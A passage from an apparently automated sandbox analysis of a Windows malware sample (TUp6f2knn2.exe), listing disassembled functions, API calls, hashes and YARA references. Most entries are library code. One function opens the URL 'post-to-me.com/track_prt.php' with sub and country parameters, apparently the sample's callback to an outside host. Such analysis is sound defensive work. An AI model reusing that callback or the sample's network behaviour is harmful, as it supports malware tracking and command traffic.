std::_Locinfo::~_Locinfo.LIBCPMT ref: 025350B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0253511C
__Getcoll.LIBCPMT ref: 0253512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0253513B

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: aa2c97db5b0fa2d061965ef7324bbb60ee0a74473e9ab3f10aaa399faee0ad95
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: 1F21D0B1814306EFDB02EFA0C4447ECBBB1BF94716F50A41EE485AB180EBB49544CF99

Function 025621C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0253DAD7,0253DAD7,00000002,0255ED35,02563951,00000000,?,02556A05,00000002,00000000,00000000,00000000,?,0253CF88,0253DAD7,00000004), ref: 025621CA
_free.LIBCMT ref: 025621FF
_free.LIBCMT ref: 02562226
SetLastError.KERNEL32(00000000,?,0253DAD7), ref: 02562233
SetLastError.KERNEL32(00000000,?,0253DAD7), ref: 0256223C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: d0089bcbcde6b81c3f6c7d5ba8b6d8bbd09ab948dc74e602eadbfdb4ee96168a
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: D201A436245B027B93166B349C4CE3A2A6EBBD2B72F640538FD15D3291FFB0C905856E

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 02562141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
_free.LIBCMT ref: 02562178
_free.LIBCMT ref: 025621A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 3231329ff1356ff6b8d43690f4b2eacf3b5d082e981361d9293d5e746a27fd11
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: 84F03135689B123BD2162734EC4DB7A2A2ABBC2F62F250125FD18D3290EF758502856D

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 02547B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 025429A4: TlsGetValue.KERNEL32(?,?,02540DC2,02542ECF,00000000,?,02540DA0,?,?,?,00000000,?,00000000), ref: 025429AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02547BB1

Part of subcall function 0255121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02551241
Part of subcall function 0255121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0255125A
Part of subcall function 0255121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 025512D0
Part of subcall function 0255121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 025512D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02547BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02547BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02547BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02547BF1

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 79b4faf986172bac68085571997460a5cc6c47f37b6ef3b347f2e3fb9f5449c1
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 72F0C231A0062A67CA15B675C82496EFA67BFC0B1CB00416AD80093650EF25DE458E99

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 0256A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0256A0C4

Part of subcall function 025636D1: HeapFree.KERNEL32(00000000,00000000,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?), ref: 025636E7
Part of subcall function 025636D1: GetLastError.KERNEL32(?,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?,?), ref: 025636F9

_free.LIBCMT ref: 0256A0D6
_free.LIBCMT ref: 0256A0E8
_free.LIBCMT ref: 0256A0FA
_free.LIBCMT ref: 0256A10C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 73e98aa7a9f9b0c995eead0ca7e60501b40d6cdc3c74a8646bc2b5681f7eef66
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 7DF09632505310BB8760EB54E8CAC367BDABA447607640995F008E7B11CB71FC908B5D

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 02561991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 025619AF

Part of subcall function 025636D1: HeapFree.KERNEL32(00000000,00000000,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?), ref: 025636E7
Part of subcall function 025636D1: GetLastError.KERNEL32(?,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?,?), ref: 025636F9

_free.LIBCMT ref: 025619C1
_free.LIBCMT ref: 025619D4
_free.LIBCMT ref: 025619E5
_free.LIBCMT ref: 025619F6

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 28c9a9df94fed82d9efcd8db34262fb52c177898e8dd9d757902d9fac026f81c
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 61F03A70D00721AB9F616F24ED884253B61BF09B6270042AAF406977B2C774D8A2DF8E

Function 0254CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0254CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0254CF67
GetCurrentThread.KERNEL32 ref: 0254CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0254CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0254CF8C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: af99248063098814a2efa8e90aed191f8327836cac5dd77cf54b8fbe6768492e
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 09F0A736201501FBC625EF20F6508BAF7B6BFC4619310464DD58706660CF25A806DB69

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 02532E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02532E8E

Part of subcall function 02531321: _wcslen.LIBCMT ref: 02531328
Part of subcall function 02531321: _wcslen.LIBCMT ref: 02531344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 025330A1

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 02532EBE, 02532FEA, 02533059
&cc=DE, xrefs: 0253301B, 02533021, 0253307E

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 1dd1fa0bac553feb49e90cbfbc5e6ceecfe83394c402baae40622a873d89e702
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: A2515195E65345A8E320EBB0FC55B722378FF58712F10643AD518CB2B2E7B0D944875E

Function 02558937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0255896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02558A23

Strings

fB, xrefs: 02558A15, 02558A1E, 02558A2F
csm, xrefs: 02558A0D

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6c615d04739e4002197133fb9e4a51c4f1729232cd752c47c2da21728385015b
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: BC41D634A00269DBCF10DF28C8A8AAE7FB5BF44328F148167ED155B391D736A941CF99

Function 0255F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TUp6f2knn2.exe,00000104), ref: 0255F9BA
_free.LIBCMT ref: 0255FA85
_free.LIBCMT ref: 0255FA8F

Strings

C:\Users\user\Desktop\TUp6f2knn2.exe, xrefs: 0255F9B1, 0255F9B8, 0255F9E7, 0255FA1F

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TUp6f2knn2.exe
API String ID: 2506810119-1694308924
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 0486b6d5c577e756d8171036992f13fd82ecf64bbd9e953f88925ed3a6b86bd9
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 49318F71A00269EFDB21DF99DC9499EBBFDFF8A710B104067EC0497621D7709A40CB99

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TUp6f2knn2.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\TUp6f2knn2.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TUp6f2knn2.exe
API String ID: 2506810119-1694308924
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0253C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0253C8DE

Strings

ios_base::badbit set, xrefs: 0253C8A1, 0253C8C1
ios_base::eofbit set, xrefs: 0253C8B0
ios_base::failbit set, xrefs: 0253C8AB

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: 8020439dff316b98ac8645cab9b647efbeb0f6d447c1dbaeca49b7863e9414c2
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 82F021738001086ACB05E554CC45BEA7754BB45327F04946BDD42B7182E7699A05CB5C

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

